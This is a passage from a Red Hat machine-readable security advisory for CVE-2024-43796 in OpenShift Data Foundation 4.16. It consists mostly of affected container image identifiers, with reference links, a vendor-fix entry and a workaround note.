"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-15T08:52:38+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
